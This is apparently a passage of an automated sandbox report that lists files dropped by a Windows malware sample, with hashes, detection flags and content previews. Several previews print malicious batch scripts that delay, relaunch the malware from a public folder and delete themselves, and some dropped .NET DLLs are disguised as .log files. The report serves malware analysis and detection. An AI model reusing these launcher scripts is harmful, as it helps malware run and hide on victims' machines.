Preview:	tV0Oh5xc6MFyFdlQqk5feSqNNi7mQGzWCgtYdS58qeLqqgg2sj626z4bpmA97LM0WsvjuMwXo6y9H9hqCF3qJ7aMlSs0S5BfSVT7v6IfxjNAA4UpFT72RgqZSi8bd5Fs5Trwqj5F7Y2ktZLq8Dv88IOvo3oM8qB1deErNi9fY152nGq2WRdaKGuwF5Hx4tHQXBGOUedZEPkGNVIiMvzqNkqWuSmRaMkouofl9ci2yDW5goitxjkI3aDwUtdC1L91o5VjzgiuN72JNv0Gu2e1mbvUlsRP8fAnEeQlS84QAz55i4ij3XS8qIPMJB8GPTvr6PEtfPxv8O0wgzwrJsWkNB66ODbQAxBqDN9SzzDojgAcRdpTPR7h7Le4SIebyhuLNJsT0d1UosBrBeovXHBt0dt2tEAqVmzCwy

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GSwhJpqdkmruXxiphyV.exe.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
MD5:	73E7DD0D3AE6532ADBC6411F439B5DE3
SHA1:	427BE8DB5338D856906C1DDFBD186319A02F7567
SHA-256:	A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
SHA-512:	33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vb8DOBZQ4X.exe.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.316893341077155
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1aHF5hdCl+VxtoOVoovBktKcKZG1t+kiE2J5xAIZq:hCRLuVFOOr+DE1aH9dCu3pV1vKOZG1wM
MD5:	F1E58BAC62EDD9AAC2BBB9645C6A1DF5
SHA1:	A0890A4D59899183C99095216C7F4ED5C9685BD7
SHA-256:	350D99A8B062935FF67F19B2C61F44B2CD757000CB3CE0F7AD11DFBF04A4EC7A
SHA-512:	8224E7FDD6E303243084F23774F4CBB761E990652410328854FAE0A9D71EB67515A522B24546AAA91D27281AEDDFDFD349EDB14C5E51608A3ECB2A294EAE4DD0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1dc23k5BXS.bat"

C:\Users\user\AppData\Local\Temp\4NLGXdFk3d

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:pMLB6c1oBAnn:pMLBFoBAn
MD5:	3B5FC68D3AC5A4E65116E5016B420993
SHA1:	600BA7193E48A29A63C9D4CFBF6B31BDA15C9B97
SHA-256:	DF146F66170FF02D7F5B516F8C9072C9C267A68CB0838C0B465D4B30A0E835D5
SHA-512:	B9B767C429B19EA9CB5761B4FE72B404769AD7F543CFB93D517995051E37D07F873E81B79C44F83DACBE42A8CDD445118655201DF57534AEDC92886ADC386F6E
Malicious:	false
Preview:	7RNcveJelx1nd26C9lG1KBdeB

C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.293493852658645
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1aHF5hdCl+VxtoOVoovBktKcKZG1t+kiE2J5xAImj:hCRLuVFOOr+DE1aH9dCu3pV1vKOZG1wq
MD5:	D4A46BF1E2AC3648494F472ED16AD1FD
SHA1:	AA5621792AC1A2BBFA6070255E23253AC78B8C99
SHA-256:	DFB23D83AC23048576FA05DEA63CC21F21C290A100463E5CA9389302027C2FD1
SHA-512:	7A13F8ED6578F77E54E3A15C04CCFFB20ECBEDC97842A14A548840DD49923FE5034EF4140AEE9ACAB23739A9C667929F19C00EE4522ED4A62DFCC3E4768BAE4F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EAk7xcglkE.bat"

C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.3023669625859275
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1aHF5hdCl+VxtoOVoovBktKcKZG1t+kiE2J5xAIgH:hCRLuVFOOr+DE1aH9dCu3pV1vKOZG1wi
MD5:	FC44C69E9E1D3EE58F643C6AD914B3E5
SHA1:	402CDA876ADE67F912B743FC77D54D046D13AE2E
SHA-256:	41FD0D82E84291046225B4E94C4092FC1E6D54E5C840C4DA9B3EF923DE01B319
SHA-512:	4AFF0F852A5951F6DC0E5FA4E3D0E19C200910827ECDE998A46870DC97E89782CB9715E40FE70E45ABD3BE8D2FB344B3D5FDB09C1437BF16A455E71105EB288B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HSh65PBXsw.bat"

C:\Users\user\AppData\Local\Temp\II5SPFdHiW

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.563856189774723
Encrypted:	false
SSDEEP:	3:WZInfYB9:WZIfYb
MD5:	A7EFBB56E00F92ED51ED357D65FD2926
SHA1:	EBEE98B820B2AB22BDB88C7722D51AD10D3139ED
SHA-256:	A5B6EBD98A53FB2D8ED7BA64E61FD39A7748729B4A2BB17ABC82D62EB057652E
SHA-512:	B63DEABAA1EB179123DD671A0045F5311DE6DC0B41A1DE02D4F6089C4EAFE5A18EA1B99E0A78165408EB3237555414DB180971A3B959F3150C84EDAC3A0485B5
Malicious:	false
Preview:	Cp3FcnqkloQi4DTzL8wBd91we

C:\Users\user\AppData\Local\Temp\LwMv4vVUKj

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:0dj1o9V3:si9V3
MD5:	2BCCC8330DEDF6490A012B5C60B1ED40
SHA1:	22900EB622B31D3F7A2990C1B5F15F67E9472EA9
SHA-256:	1CD0E51A45E7108915495649A6E353AF569E5A4177C290ACBDEA64673FD1874A
SHA-512:	94540374334B428AF635F3E556485CD593890DB8B2F015DC9D371C9FC795121B92D9CF05DC233F57D67D5F5D0F4922272224F89A68391D855012470FC6713134
Malicious:	false
Preview:	plAJRGijyyznDl8RMX2hVS05R

C:\Users\user\AppData\Local\Temp\SbTZcnTXHu

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:zKI30Kn:eIkKn
MD5:	4CA07FA17C4212E66E1DA1625708613A
SHA1:	12B7A2E64407290D95EF34D5588BB42989A8821F
SHA-256:	2DCBCC6082E3E5A57936C754C9D9A9CF15EE117A638EBB8964E0D3B8B24F8C69
SHA-512:	F8F88736EF250497455C63D804B83299653A2F3A142B46DB50B0A284650CFC7B3BCA1BEDC681E80530686FFD287E9C14EE84C9AE825783B2B79BB8D7D5B0F69E
Malicious:	false
Preview:	zyk4cw6cf6gnt4jrrbj1D7yM2

C:\Users\user\AppData\Local\Temp\U9JiIYF0y0

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688184
Encrypted:	false
SSDEEP:	3:08AMvgo21n:08Acgo21n
MD5:	281C9EA9ADF1205CD87588A3FEEFC68A
SHA1:	18D8E0359FFD771D4BC81772B6EDCBB0768773CB
SHA-256:	00FE4AAFF5BDFE09D5CFC1E74A56278647F6B1169F2269ADC5419D66AB68CC8C
SHA-512:	7F055080A5AB6E91ECE59CE71067C736851F378650180C0D92F303B676B228A188A14FC59DBCF0100855FD6D848EEBBF9905EC62CB13B54ED653C94D4F1A1653
Malicious:	false
Preview:	axYei4lEMhjOrFHKFmkECcKF1

C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.33869159277164
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1aHF5hdCl+VxtoOVoovBktKcKZG1t+kiE2J5xAIbx:hCRLuVFOOr+DE1aH9dCu3pV1vKOZG1wl
MD5:	D07336E7B791DA0693C77AE6238DCADC
SHA1:	A668966F00658159D54D773FCE5E24577B8FB1CC
SHA-256:	6BEEB7393A9C91EB143381D37ACFF61577A34A9763064213D17FE520E98A0084
SHA-512:	F018193EFBA14989DE1A99CAFF95A4A2D6CE27D24B6ED44BF976EE8B4F32948F66EE0EFD7B6EFF71ADD2CBEF6FE512672D1DACE29D31AC2D6B0E5DE201F3BFD6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\V20VgTPM9z.bat"

C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	225
Entropy (8bit):	5.2253769216955925
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1aH9dCu3pV1vKOZG1wkn23fjuzoq:HTg9uYDEGdX3pV1Df7o
MD5:	200F82F9086D3291139163A938542334
SHA1:	02EBC26C9B651A7316DEC2EC6D7C7D53E6FB2A62
SHA-256:	17EC76EC71A0B988A254B98807D46274E35495E3A20D79113F03AA1C66C8C43F
SHA-512:	9FC478E0654D8385572D22BB3A1E215A6BEEB18D6A1A065D4BEC8551AF335F14987F04C72B6EB99B5EDD672EC7949B42DB8ADCDFB49A2CAA591503ADD119EA25
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZLKnXXaim4.bat"

C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	225
Entropy (8bit):	5.254737379014642
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1aH9dCu3pV1vKOZG1wkn23fXyfWZH:HTg9uYDEGdX3pV1DfPXZH
MD5:	8B52CA52E89AC1910A3EC7024965571E
SHA1:	C28252EA9800145FE8F7B1327CB4E3AB9BFABF38
SHA-256:	A7CD7F6A5BF681B671C2E2F14979A1795D4A5C96AB1746B03CE8436EC857F5BF
SHA-512:	017F1ECCDE058DBDEA94BCCD1EE877C4D6260DC0D2B3B019DE16A36C661E19F8DCD56B8AF3F9DFB76B4D9533DD7C4BD06EE3A540422586850BC242F1C6E15F9E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZxWzsCgC4b.bat"

C:\Users\user\AppData\Local\Temp\dTnnyVXz72

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:fBVGe0JD:5kLJD
MD5:	50470D25BBBF9B8EFC99335B7E06540C
SHA1:	E1C87FBC4C383E1EFABD7AB413BFEB6DACB6A162
SHA-256:	51101EBFDA97A87D73B13A0E7DFB4F34CE6B5A64EBDA5F65FAAE062EE3BEF904
SHA-512:	9A9D445E11B21FAFC414AA1E455D1FE018E81F2CE2AAF3BCA57DE07C498021DBCA498828A0B017529A5920FC44CD8B339C60C13ACFA4228C9DEEC666FE248E77
Malicious:	false
Preview:	4KGgg7CDuuhV2Y8dDKQ1yLCCB

C:\Users\user\AppData\Local\Temp\dlXwaKxmE0

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:vjHSuCCq+:+c
MD5:	1A6388D79C96501BD914B64D3B893651
SHA1:	FFE8F8FC2118322A78C96EAD5367CD62E5D43196
SHA-256:	84A60B804F706AC04B6B3A0F818A940726D3EB51D7272EB78C584B05A1B6A23B
SHA-512:	D267585CD8915B466321E7D43B78B5345DCDEA670002AC44B3FE0426DBFB0D6303CE661DAE28B4A60682DF3552625F2AD4DF421A716EE750D82E04C9C57FF4BE
Malicious:	false
Preview:	zrBFX0bwKgdlCab0dxwBjwUSG

C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	225
Entropy (8bit):	5.233533379311676
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1aH9dCu3pV1vKOZG1wkn23fSXMWG:HTg9uYDEGdX3pV1Df8MWG
MD5:	56BFCF9028CF0FF49A0BAE4B9FB980D6
SHA1:	C2BB58592FA680D1C60EB4D2C539DC7747DF8675
SHA-256:	8E4E0270C30E445421C04CA7511A0C21E4755FD016B68646AA6DE0B475AC4954
SHA-512:	BD43F5689E048600156B6D622815A16AACBFF5158851E3B6C65C06D0172FB13F7332B437A09D939D86BF29F20E534B1EF2C3484C0A1F69FF06E56821EA2197A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dvHErHhaAz.bat"

C:\Users\user\AppData\Local\Temp\jTClDdUD7P

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:TDjJR0bb:v9R03
MD5:	09FBB9EA88742BC8F79DD4D502247D53
SHA1:	1858201BD1BD66AFA6B1F80203EF1F5F01CE6E4E
SHA-256:	DAE0E2F2C5E25C3E89E705154E4148C00DB527F1C284EE39D00332A249550B52
SHA-512:	E09D1ABC11B06F7D37BB3A658B2FE9D71F5A40D06910A649DDEADF54FDA61FF9CA5D45A55C154BB6F6AC4370DF93DC9737E65A9EB12FBE2DCB7210C312B8E526
Malicious:	false
Preview:	iwkINRwXWoQbtKwF92mdiWmnJ

C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.313902804280653
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1aHF5hdCl+VxtoOVoovBktKcKZG1t+kiE2J5xAIEf:hCRLuVFOOr+DE1aH9dCu3pV1vKOZG1wy
MD5:	9C5E435CCB2F09E264DCFFAD5BB887A4
SHA1:	07E4DD52E4E7140A7B1235079D3966FD8F9D3D7A
SHA-256:	6B4B2E20CC74CFE9F63772118D22C1B324795A6013E770A6C27DD2D567B8ADA0
SHA-512:	75E1C752050B95DC9F80C7A753D450CE63FD3D5F6D705B1533FF95AEF8CB8FDD2E2670C3E3ACA214B296E9017E4BB793C1A7A0DF5B51B4FA9723E8E30348E16C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qgs8WdcQ4J.bat"

C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	225
Entropy (8bit):	5.222093032490436
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1aH9dCu3pV1vKOZG1wkn23f7H:HTg9uYDEGdX3pV1DfTH
MD5:	2C36D5B385B3CFDE0D251F18273D1FF8
SHA1:	30BED9BAE4602DDCC108F5E89999241D290BB7FB
SHA-256:	DAF783E93060F69627BA5504609867AB160CAACF162846CC44D430D8B56F33D7
SHA-512:	4C5E25F98A48F250D0B9E3F25509858C8D5902FF946F93490216F26201DEFE23F10157EEBFFBDDCE6402440451C57565C2AE734597D56B5BC30ABB6062CA9E95
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tzbRZhAhjd.bat"

C:\Users\user\AppData\Local\Temp\uaYyBCv6bv

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.909275070710712
Encrypted:	false
SSDEEP:	3:46puSASIPi:4bS3
MD5:	616899D450FFAEEC1F09C83BB520B9B0
SHA1:	B80B18B805A8232B63EE7C694B0F2D6DE7AB93E3
SHA-256:	F8BE25D050BCCD48890E114CD8505AD9ABCCFB7A48C4DBAFDC6DD1532AE61FD5
SHA-512:	FBAAE7482487E82C8B6EED126A83A575061887FA0D01C2E24FB6B1B45BC433DD03936FEA36E14B57761CB16E6A3AB0069A2DBB50479CD58230A9CA145DB5DE7B
Malicious:	false
Preview:	iL1ERLqfv77K7gGs7mR7IRUn8

C:\Users\user\AppData\Local\Temp\vNE9ZJc2Q5

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:oFfngHVp:oF/+Vp
MD5:	721E76AF5311938C6996A48601B5AD00
SHA1:	B5229312405BFE4CFBCB294299466921391FDA0C
SHA-256:	00C500DC860047791E689ECB55C08CF6AB0B1711102AB40947D5599714A09DF5
SHA-512:	C1A7ACDA91B81DCEC43C8A6EE8D0B7E60316A76B54D6F72E4D3DEFB229957D2C556F1FA3003D7E31114C30D5E6F16DB3ECF6C31716E3EDF704B482A2F1AF94FE
Malicious:	false
Preview:	olQAJmeK1uhZ7zuWJM0IRepmq

C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	225
Entropy (8bit):	5.19984902261954
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1aH9dCu3pV1vKOZG1wkn23fz:HTg9uYDEGdX3pV1Dfb
MD5:	8CECFC27EB93890A73E680D6BE32DFB9
SHA1:	AD767BA865C4048E0AF3617387362A8418D12320
SHA-256:	EA8ABB6DCF1B83E9BD87FEAC2A9B5CE2F9DE1AF1F16B9930055EE8C6F64E2539
SHA-512:	B42210863AEF2B2BC9DD9320512E36417F15154A7638A9845C3DB7E1537719962A9D4838762DB6336DB6A963FFC901C849F8696473AE766A14B1A9D54385E82B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xtlNdaBxkU.bat"

C:\Users\user\Desktop\9bb690742526e0

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with very long lines (811), with no line terminators
Category:	dropped
Size (bytes):	811
Entropy (8bit):	5.893156336685444
Encrypted:	false
SSDEEP:	24:DAuDeseLVEKZm39zB4zuFhrVToyV+zxhhN8Qmvj3N:c5WK69fm6kN8QIN
MD5:	D20B271322966A31A03FEE487D7D9B2F
SHA1:	679FF218134536044590CDFE68074CE06C823674
SHA-256:	4BCA3D4454DAB2953C6EE9989D8177B06A505EF4E0C2CEEC83A0314C5D7B4239
SHA-512:	DEB24C6DB6ABDABD0B661F8EEECB14A752DBC883B60D516B3BAE92CAE4DC9C94B49661861A06749F7A8CAFBEF35C7F4581545B6DF9C52FBDF31D2D68E447325C
Malicious:	false
Preview:	FtltWRep07uVLiO0WpdQ5HaPb1xA0B2zt58OW3hmLaVAz9SeNWvBa637TVSfeezyF5mQk9ecI1EewZZbjSwdQ0YxCB5AkCIrlg54XC4O2S2j1YK3605LrVhOgzOiEd1GtX3QeeEhYik87z5n0BEuG79P8qYiyVJZaw0ef4ZbvYxJujQq3ksDZH9wXnRxGgtCYLiL9aI6lm8sJ0eZZroNnGASwEH2mmUPouujAFqdcvbwIRmhI2XZ1fYSLPY5TQU9SsDZF5YUALv2pNKfcjttO5XJVcYvqvJLbceZNMbNeDYqugn7F2dtgkuWV4DngnnPBjbNsuSPIfPLgrYyyapyRap0rHESJxq0ZJpKFaOVkOlAVi0ofOyG8z7k4kflp9GUzYwXBOtYLTNDyoeIRax48k2kLEQe4nplHRL6wcmRfa4ol3wQGWTOMMVOgML77Oeiom5hciWyyfYiqO8SSAYhTbZ557ZkRpTR5WA97OyhAeaqxwiSN3o7z6OMNAleIwhILHnTN9UDM0hzAsIIZHWYAWb9Ixw7mTZN7RepJOEOilv8YZMe1dEBZIIzqnLaMWb2bT1sOc9LCIzZkdktkRFJOYyzJo9fCnBMK2gFhdQYd38RSsPMDcz5RRoDfBjjddIYGnPr6eLHBqpUZggaZwbkxG42Odjf4q5AvjLpdhQiQs3klTn8fIKqBhl9sXcc5pMVvpj0V171f2UENUQ5zlAvfO8N8L6GFxnkgiz6txnoLTLJNgwYGgnUpazgrV1J40wrPtiofUMB7VkMDzAcZi9iKT5FsSOY5duUgd3e7H2wUlW

C:\Users\user\Desktop\AGiVvpLm.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Joe Sandbox View:	Filename: 6G8OR42xrB.exe, Detection: malicious, Browse Filename: XNPOazHpXF.exe, Detection: malicious, Browse Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse Filename: DWTukBG9R7.exe, Detection: malicious, Browse Filename: 150bIjWiGH.exe, Detection: malicious, Browse Filename: wmdqEYgW2i.exe, Detection: malicious, Browse Filename: CPNSQusnwC.exe, Detection: malicious, Browse Filename: xoCq1tvPcm.exe, Detection: malicious, Browse Filename: eu6OEBpBCI.exe, Detection: malicious, Browse Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\AnBXspYe.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
